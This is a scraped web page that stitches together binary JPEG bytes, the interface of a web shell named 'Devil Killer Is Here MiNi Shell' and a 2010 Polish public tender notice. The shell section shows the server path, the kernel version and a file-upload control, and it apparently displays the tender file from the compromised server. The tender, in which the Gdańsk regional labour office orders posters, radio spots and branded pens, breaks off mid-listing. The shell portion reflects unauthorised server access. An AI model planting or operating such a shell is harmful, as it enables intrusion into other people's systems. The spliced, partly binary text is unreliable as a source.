JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100319/61705-N-2010.html

<p class="kh_header"><b>Gdańsk: Usługi w zakresie promocji</b><br>
<b>Numer ogłoszenia: 61705 - 2010; data zamieszczenia: 19.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Gdańsku , ul. Podwale Przedmiejskie 30, 80-824 Gdańsk, woj. pomorskie, tel. 058 3009340, 3009351, faks 0-58 3009343.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup.gdansk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie promocji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z 7 części:

Część I. 
Usługa obejmuje przeprowadzenie kampanii informacyjno - promocyjnej oraz zaprojektowanie i wyprodukowanie materiałów informacyjno-promocyjnych, w tym: stworzenie spójnego layoutu materiałów (z wyjątkiem pkt. k, dla którego należy stworzyć oddzielny projekt) wraz z zapewnieniem zdjęć do projektów, w tym:                                                                                                                   

a)	Plakaty I - Projekt i druk, wymiary: 411 x 588 mm-spad 8 mm zbliżone do formatu A2; papier-kreda błysk 135g, kolor 4:0; nakład 400 szt.
b)	Plakaty II -  Projekt i druk; format A1 (594 x 841 mm); papier-kreda błysk 135g, kolor 4:0, nakład 100 szt.
c)	Ulotki A4/3 - Projekt i druk: kreda mat, 135g, kolor 4:4, lakier offset, format A4/3, nakład 1000 szt.
d)	Naklejki - Projekt i druk, wymiary:72,2 mm x 73 mm, papier biały powlekany 90g, druk 4:0, nakład 15 000 szt.
e)	Długopisy metalowe - długopisy metalowe z klipsem, nadruk 1 kolor dwustronnie (2 logotypy i adres www), ilość 1000 szt., przykład długopisu -  Załącznik  nr 4
f)	Długopisy z zakreślaczem - Długopisy z zakreślaczem- różne kolory, nadruk 1 kolor, jednostronnie (2 logotypy i adres www), ilość 500 szt., przykład długopisu - Załącznik nr 5
g)	Notesy - zestawy kartek samoprzylepnych i małych karteczek (zaznaczników), wymiary notesu ok. 13 cm x 8 cm, nadruk w kolorze (2 logotypy i 2 adresy www), ilość 500 szt., przykład notesu - Załącznik nr 6
h)	Citylighty - Reklama na wiatach przystankowych w formie 4 citylightów; usługa obejmuje projekt i druk plakatów oraz wynajem powierzchni; druk-papier 150-170g, dwustronnie biały, plakat 4+2, 2 kolory z tyłu, 4 kolory z przodu, przystosowany do umieszczania  w nośnikach typu backlight, wymiary: 1,20 x 1,80 m; miejsce ekspozycji citylightów: 2 w Gdańsku-Wrzeszczu (preferowane przystanki autobusowe lub tramwajowe we Wrzeszczu na wys. Manhattanu i Galerii Bałtyckiej ), 1 w centrum Gdańska (przystanek autobusowy przy PKP w Gdańsku Głównym), 1 w centrum Gdyni (okolice ul. Świętojańskiej); czas trwania kampanii 14 dni w maju 2010r.- najpóźniej do 18.05.2010r. 
i)	Projekt ogłoszenia prasowego - Projekt 1 ogłoszenia do gazety, wielkość pół strony gazetowej, projekt spójny z pozostałymi materiałami informacyjnymi
j)	Komunikaty radiowe/spoty - Scenariusz, produkcja i emisja spotu reklamowego w stacji radiowej nadającej program o zasięgu lokalnym-Trójmiasto lub regionalnym-województwo pomorskie; długość spotu 30 sek., 1 lektor oraz podkład muzyczny, długość kampanii: 1 tydzień w okresie między 5 a 18.05.2010r., ok.4-5 emisji dziennie w godzinach popołudniowych (ok. 30 emisji przez okres 1 tyg.)
k)	Banery reklamowe - 1 wspólny projekt i wykonanie 20 szt. banerów reklamowych - system wystawienniczy typu roll-up+pokrowiec na cały system, z aluminium, plansza nie może przepuszczać światła, druk wielobarwny jednostronny (4+0), roll-up lekki, stabilny, wymiary systemu razem z planszą: szer. 85 cm, wys. 200 cm.
l)	Wydruki 1,5m x 0,5m - proste projekty i wydruki 4 plansz z informacją o warsztatach podczas Targów Pracy, wymiary: szer. 1,5 m x wys. 0,5 m, wydruk na cienkim papierze
m)	Baner internetowy na portalu poruszającym tematykę Trójmiasta - projekt i publikacja 1 animowanego banera reklamowego (technologia Flash) rozmiarów ok. 750x100pikseli  na portalu poruszającym tematykę Trójmiasta, preferowane strony główne lub podstrony dot. pracy; długość kampanii 1 tydzień w okresie między 5 a 18.05.2010r ,
n)	Baner internetowy na portalu poruszającym tematykę pracy - projekt i publikacja 1 animowanego banera reklamowego (technologia Flash) na portalu dla osób poszukujących pracy (np. gazetapraca.pl, pracuj.pl, praca.wp.pl, infopraca.pl itp.) z zaznaczeniem reklamy tylko dla woj.pomorskiego); długość kampanii 1 tydzień w okresie między 5 a 18.05.2010r ,

Część II.
Dystrybucja naklejek w prasie bezpłatnej  (naklejenie + kolportaż)
Dystrybucja naklejek (naklejenie + kolportaż) w prasie bezpłatnej o zasięgu trójmiejskim; naklejka ok 7cm2,  miejsce wklejenia: prawy górny róg okładki-pierwszej strony gazety; data emisji: 17.05.2010,  nakład 15 tys. sztuk.

Część III.  
Ogłoszenie prasowe - wynajem powierzchni reklamowej w prasie
Emisja 8 ogłoszeń prasowych w prasie o zasięgu województwa pomorskiego - po 4 ogłoszenia w 2 tytułach prasowych w okresie od 3 do 18.05.2010 (nie więcej niż 2 ogłoszenia w tygodniu w każdym tytule), preferowane strony: dotyczące tematyki rynku pracy lub Trójmiasta; wielkość ogłoszeń - pół strony gazetowej.


Część IV.
Usługa obejmuje wykonanie poniższych materiałów informacyjno-promocyjnych:
a)	Wydruk planszy do banera - Wydruk 1 planszy-grafiki do bannera typu roll-up (wymiar 85x200cm, plansza nieprzepuszczająca światła, druk 4:0) wraz z montażem do konstrukcji (przyklejenie), którą dysponuje WUP. Konstrukcja banera będzie do odbioru w Wojewódzkim Urzędzie Pracy ul. Podwale Przedmiejskie 30, pokój 122.
b)	Długopisy - długopisy plastikowe, czerwone, nadruk -2 logotypy w 1 kolorze-białym, druk po środku korpusu i na klipsie, ilość 2450 szt., długopis -  Załącznik nr 7
c)	Balony - balony czerwone wraz z patykami, nadruk w 1 kolorze-białym (1 logotyp), ilość 1700 szt.

Część V.
Klipy do papieru -  600 szt. klipów do papieru, metalowych, gumowych lub drewnianych, wytrzymałych wraz z nadrukiem logotypów w kolorze w miarę możliwości z dwóch stron (2 logotypy), przykłady klipów -  Załącznik nr 8

Część VI.
Stworzenie menu kontekstowego oraz nagranie 380 szt. płyt, na których znajdzie się: plik raportu pełnego (pdf), plik raportu skróconego (pdf), plik z tabelami (excel), plik z aneksem do raportu (word); stworzenie systemu autoodtwarzania płyt, w skład którego wejdzie: projekt graficzny i stworzenie menu kontekstowego (linki do załączonych plików). System autoodtwarzania należy zaprojektować zgodnie z layoutem przekazanym przez WUP (layout - Załącznik nr 9) - wraz z zakupem 1 zdjęcia z bazy iStockphoto nr: 7069075. Czyste płyty z nadrukiem, na które należy nagrać pliki będą do odbioru w Wojewódzkim Urzędzie Pracy w Gdańsku, ul. Podwale Przedmiejskie 30, pok. nr 117.

Część VII
Stworzenie spójnego layoutu  materiałów informacyjnych wraz z zapewnieniem 1 zdjęcia z bazy zdjęć do wykorzystania we wszystkich materiałach, w tym:
a)	Teczki - projekt i druk teczek, nakład - 290 szt., format A4, gruby grzbiet 15 mm, papier karton 350 g:m2,  kolor 4:0, teczka zamykana na gumkę, 3 skrzydła, folia mat po zewn. stronie teczki.
b)	Notesy - projekt i druk notesów, nakład - 290 szt., format A4, 50 kartek, papier offset ok. 80 g na spodzie tekturowym,  nadruk - kolor 4:0, bloczki klejone po krótszym boku bez okładki
c)	Długopisy - 290 szt. metalowych długopisów z klipsem opatrzonych logotypami, wykonanie nadruku laserowego na korpusie po dwóch stronach, nadruk w 1 kolorze, niebieski wkład,  przykład długopisu - Załącznik nr 10
d)	Broszura 2xDL - projekt i druk broszury, nakład: 200 szt., format: 2xDL (20 cm x 21 cm) łamane do 10 cm x 21 cm,  papier - kreda mat, 135g, druk - kolor 4:4, lakier offsetowy
e)	Zaproszenia - projekt i druk zaproszeń, nakład - 200 szt., format A5 łamany na pół, papier ozdobny lub kreda mat zabezpieczona, 300g, kolor 4:4
f)	Dyplomy - projekt i druk dyplomów format A4, papier ozdobny 300g, druk kolor 4:0, nakład 200 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5, 79.82.30.00-9, 79.82.25.00-7, 79.97.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w.w warunku poprzez oświadczenie stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w.w warunku poprzez oświadczenie stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w.w warunku poprzez oświadczenie stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w.w warunku poprzez oświadczenie stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w.w warunku poprzez oświadczenie stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wup.gdansk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Gdańsku ul. Rzeźnicka 58 w Gdańsku, p. 2.12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2010 godzina 09:30, miejsce: Wojewódzki Urząd Pracy w Gdański, ul. Podwale Przedmiejskie 30 w Gdańsku, Kancelaria p. 218.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 
oraz z Grantu Eures.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> kampania promocyjno-informacyjna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa obejmuje przeprowadzenie kampanii informacyjno - promocyjnej oraz zaprojektowanie  i wyprodukowanie materiałów informacyjno-promocyjnych, w tym: stworzenie spójnego layoutu materiałów (z wyjątkiem pkt. k, dla którego należy stworzyć oddzielny projekt) wrazz zapewnieniem zdjęć do projektów, w tym:                                                                                                                   

a)	Plakaty I - Projekt i druk, wymiary: 411 x 588 mm-spad 8 mm zbliżone do formatu A2; papier-kreda błysk 135g, kolor 4:0; nakład 400 szt.
b)	Plakaty II -  Projekt i druk; format A1 (594 x 841 mm); papier-kreda błysk 135g, kolor 4:0, nakład 100 szt.
c)	Ulotki A4/3 - Projekt i druk: kreda mat, 135g, kolor 4:4, lakier offset, format A4/3, nakład 1000 szt.
d)	Naklejki - Projekt i druk, wymiary:72,2 mm x 73 mm, papier biały powlekany 90g, druk 4:0, nakład 15 000 szt.
e)	Długopisy metalowe - długopisy metalowe z klipsem, nadruk 1 kolor dwustronnie (2 logotypy i adres www), ilość 1000 szt., przykład długopisu -  Załącznik  nr 4
f)	Długopisy z zakreślaczem - Długopisy z zakreślaczem- różne kolory, nadruk 1 kolor, jednostronnie (2 logotypy i adres www), ilość 500 szt., przykład długopisu - Załącznik nr 5
g)	Notesy - zestawy kartek samoprzylepnych i małych karteczek (zaznaczników), wymiary notesu ok. 13 cm x 8 cm, nadruk w kolorze (2 logotypy i 2 adresy www), ilość 500 szt., przykład notesu - Załącznik nr 6
h)	Citylighty - Reklama na wiatach przystankowych w formie 4 citylightów; usługa obejmuje projekt i druk plakatów oraz wynajem powierzchni; druk-papier 150-170g, dwustronnie biały, plakat 4+2, 2 kolory z tyłu, 4 kolory z przodu, przystosowany do umieszczania  w nośnikach typu backlight, wymiary: 1,20 x 1,80 m; miejsce ekspozycji citylightów: 2  w Gdańsku-Wrzeszczu (preferowane przystanki autobusowe lub tramwajowe we Wrzeszczu na wys. Manhattanu i Galerii Bałtyckiej ), 1 w centrum Gdańska (przystanek autobusowy przy PKP w Gdańsku Głównym), 1 w centrum Gdyni (okolice ul. Świętojańskiej); czas trwania kampanii 14 dni w maju 2010r.- najpóźniej do 18.05.2010r. 
i)	Projekt ogłoszenia prasowego - Projekt 1 ogłoszenia do gazety, wielkość pół strony gazetowej, projekt spójny z pozostałymi materiałami informacyjnymi
j)	Komunikaty radiowe/spoty - Scenariusz, produkcja i emisja spotu reklamowego w stacji radiowej nadającej program o zasięgu lokalnym-Trójmiasto lub regionalnym-województwo pomorskie; długość spotu 30 sek., 1 lektor oraz podkład muzyczny, długość kampanii: 1 tydzień w okresie między 5 a 18.05.2010r., ok.4-5 emisji dziennie w godzinach popołudniowych (ok. 30 emisji przez okres 1 tyg.)
k)	Banery reklamowe - 1 wspólny projekt i wykonanie 20 szt. banerów reklamowych - system wystawienniczy typu roll-up+pokrowiec na cały system, z aluminium, plansza nie może przepuszczać światła, druk wielobarwny jednostronny (4+0), roll-up lekki, stabilny, wymiary systemu razem z planszą: szer. 85 cm, wys. 200 cm.
l)	Wydruki 1,5m x 0,5m - proste projekty i wydruki 4 plansz z informacją o warsztatach podczas Targów Pracy, wymiary: szer. 1,5 m x wys. 0,5 m, wydruk na cienkim papierze
m)	Baner internetowy na portalu poruszającym tematykę Trójmiasta - projekt i publikacja 1 animowanego banera reklamowego (technologia Flash) rozmiarów ok. 750x100pikseli  na portalu poruszającym tematykę Trójmiasta, preferowane strony główne lub podstrony dot. pracy; długość kampanii 1 tydzień w okresie między 5 a 18.05.2010r ,
n)	Baner internetowy na portalu poruszającym tematykę pracy - projekt i publikacja 1 animowanego banera reklamowego (technologia Flash) na portalu dla osób poszukujących pracy (np. gazetapraca.pl, pracuj.pl, praca.wp.pl, infopraca.pl itp.) z zaznaczeniem reklamy tylko dla woj.pomorskiego); długość kampanii 1 tydzień w okresie między 5 a 18.05.2010r ,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9, 79.82.25.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.05.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. jakośc próbki - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dystrybucja naklejek w prasie bezpłatnej  (naklejenie + kolportaż).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dystrybucja naklejek (naklejenie + kolportaż) w prasie bezpłatnej o zasięgu trójmiejskim; naklejka ok 7cm2,  miejsce wklejenia: prawy górny róg okładki-pierwszej strony gazety; data emisji: 17.05.2010,  nakład 15 tys. sztuk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.05.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ogłoszenie prasowe - wynajem powierzchni reklamowej w prasie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Emisja 8 ogłoszeń prasowych w prasie o zasięgu województwa pomorskiego - po 4 ogłoszenia  w 2 tytułach prasowych w okresie od 3 do 18.05.2010 (nie więcej niż 2 ogłoszenia w tygodniu  w każdym tytule), preferowane strony: dotyczące tematyki rynku pracy lub Trójmiasta; wielkość ogłoszeń - pół strony gazetowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.97.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.05.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> wykonanie materiałów informacyjno-promocyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa obejmuje wykonanie poniższych materiałów informacyjno-promocyjnych:
a)	Wydruk planszy do banera - Wydruk 1 planszy-grafiki do bannera typu roll-up (wymiar 85x200cm, plansza nieprzepuszczająca światła, druk 4/0) wraz z montażem do konstrukcji (przyklejenie), którą dysponuje WUP. Konstrukcja banera będzie do odbioru                               w Wojewódzkim Urzędzie Pracy ul. Podwale Przedmiejskie 30, pokój 122.
b)	Długopisy - długopisy plastikowe, czerwone, nadruk -2 logotypy w 1 kolorze-białym, druk po środku korpusu i na klipsie, ilość 2450 szt., długopis -  Załącznik nr 7
c)	Balony - balony czerwone wraz z patykami, nadruk w 1 kolorze-białym (1 logotyp), ilość 1700 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.04.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> wykonanie materiałów promocyjnych.</p>
